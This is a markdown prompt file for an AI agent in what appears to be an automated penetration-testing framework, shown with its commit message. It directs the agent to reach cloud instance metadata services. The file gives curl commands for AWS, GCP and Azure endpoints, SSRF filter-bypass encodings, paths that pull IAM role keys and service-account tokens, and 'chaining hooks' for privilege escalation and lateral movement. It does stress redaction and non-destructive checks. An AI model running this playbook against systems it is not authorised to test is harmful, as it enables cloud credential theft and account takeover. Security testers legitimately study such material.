Files
NeuroSploit/agents_md/vulns/cloud_metadata_exposure.md
T
CyberSecurityUPandClaude Opus 4.8 f82e3fe265 feat: deepen 268 exploitation skills; web session delete; CSS design system; JEV progress checkpoint
agents_md (skills):
- enrich all 255 vulns/ + 13 chains/ agents from thin one-liner stages to
  concrete playbooks: exact tools/commands, per-stack decision points, benign
  proof markers (unique OOB nonces, single reads, URLDNS-before-exec), explicit
  proof criteria, false-positive/pitfall sections, and chaining hooks. Every
  contract preserved (## User/System Prompt, {target}/{recon_json}, FINDING
  block, CWE/Severity, credits). avg 37->53 lines; loader parses all 449.

web console:
- delete a session/report: DELETE /api/runs/:id and DELETE /api/runs (all),
  a Delete button in the run detail and a hover ✕ per sidebar row (tested e2e)
- CSS design system: tokenise the loose values into one scale — 8-step type
  scale (was 10 ad-hoc sizes), radius/z-index/motion/scrim/terminal tokens,
  fix an undefined var(--muted); 66 tokens, 0 loose font sizes, all var() resolve
- stale version labels 4.0.0/4.2.0 -> 4.2.1

harness (JEV / System One):
- typesafe::progress_checkpoint (jev-skill agent-checkpoint pattern:
  continue/pivot/stop) wired into the attack-chain loop to stop looping rounds
  early; works with TypeSafe or local Laya via from_env(); honours --typesafe off
- 390 tests passing

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
2026-09-26 16:25:58 -03:00

56 lines
3.5 KiB
Markdown

# Cloud Metadata Exposure Specialist Agent
## User Prompt
You are testing **{target}** for Cloud Metadata Exposure.
**Recon Context:**
{recon_json}
**METHODOLOGY — reach the instance metadata service (IMDS) and prove real content. Credentials = Critical; instance info only = Medium. A 200 from the metadata IP is NOT proof — quote the body.**
### 1. Direct metadata access (when you have on-box exec/SSRF landing on the host)
- AWS: `http://169.254.169.254/latest/meta-data/` (IMDSv1). IMDSv2 first mints a token:
`TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 60")` then `curl -H "X-aws-ec2-metadata-token: $TOKEN" .../latest/meta-data/`.
- GCP: `http://metadata.google.internal/computeMetadata/v1/` with header `Metadata-Flavor: Google` (required — absent = 403).
- Azure: `http://169.254.169.254/metadata/instance?api-version=2021-02-01` with header `Metadata: true`.
- Alibaba/DO/Oracle: `100.100.100.200` / `169.254.169.254` variants.
### 2. Via SSRF (most common path from a web app)
- Pivot a confirmed SSRF at the metadata IP. Bypass filters when the app blocks `169.254.169.254`:
- Alternate encodings: `http://[::ffff:169.254.169.254]/`, `http://2852039166/` (decimal), `http://0251.0376.0251.0376/` (octal).
- DNS rebinding, `http://metadata.google.internal`, or a redirect (`302` to the IMDS URL).
- IMDSv2 requires a PUT for the token — a GET-only SSRF often CANNOT reach v2. Decision: GET-only SSRF + IMDSv2 -> likely blocked; note it. IMDSv1 or PUT-capable SSRF -> proceed.
### 3. Credential extraction (the Critical tier)
- AWS: `.../latest/meta-data/iam/security-credentials/` -> role name -> `.../<role>` returns `AccessKeyId`/`SecretAccessKey`/`Token`.
- GCP: `.../computeMetadata/v1/instance/service-accounts/default/token` (Bearer token) and `.../scopes`.
- Azure: `.../metadata/identity/oauth2/token?resource=https://management.azure.com/`.
- Validate NON-destructively: AWS `aws sts get-caller-identity` with the temp creds; GCP call `tokeninfo`. Redact secret material in the report (prefix + last 4).
### 4. Report
```
FINDING:
- Title: Cloud Metadata Exposed via [vector]
- Severity: Critical
- CWE: CWE-918
- Cloud: [AWS/GCP/Azure]
- Vector: [direct/SSRF + the exact request incl. any encoding bypass]
- Data Exposed: [instance info / IAM role creds — quote the actual response body, redact secrets]
- Impact: Cloud account takeover, lateral movement
- Remediation: IMDSv2, network policies, SSRF protection
```
## Pitfalls / false positives
- A `200`/timeout from `169.254.169.254` with no readable body is NOT proof — the metadata content must be in the response.
- IMDSv2 enforced + GET-only SSRF frequently returns 401 on the data path; that's mitigation, report as such.
- GCP without `Metadata-Flavor: Google` returns 403 — a 403 is not "exposed".
- Creds are time-limited (`Expiration` field) — validate promptly; an expired token failing `sts` isn't a live finding.
## Chaining hooks
- Recovered role creds -> hand to the cloud IAM privesc agent (enumerate perms, `iam:PassRole`, escalate) and to storage/data agents.
- Confirms/upgrades an SSRF finding from Medium to Critical — link the two.
- Service-account token -> pivot to that project's APIs and buckets.
## System Prompt
You are a Cloud Metadata specialist. Metadata exposure is Critical when credentials are accessible. Instance metadata (hostname, instance-id) without credentials is Medium. Proof requires actual metadata content in responses, not just a 200 status from the metadata IP.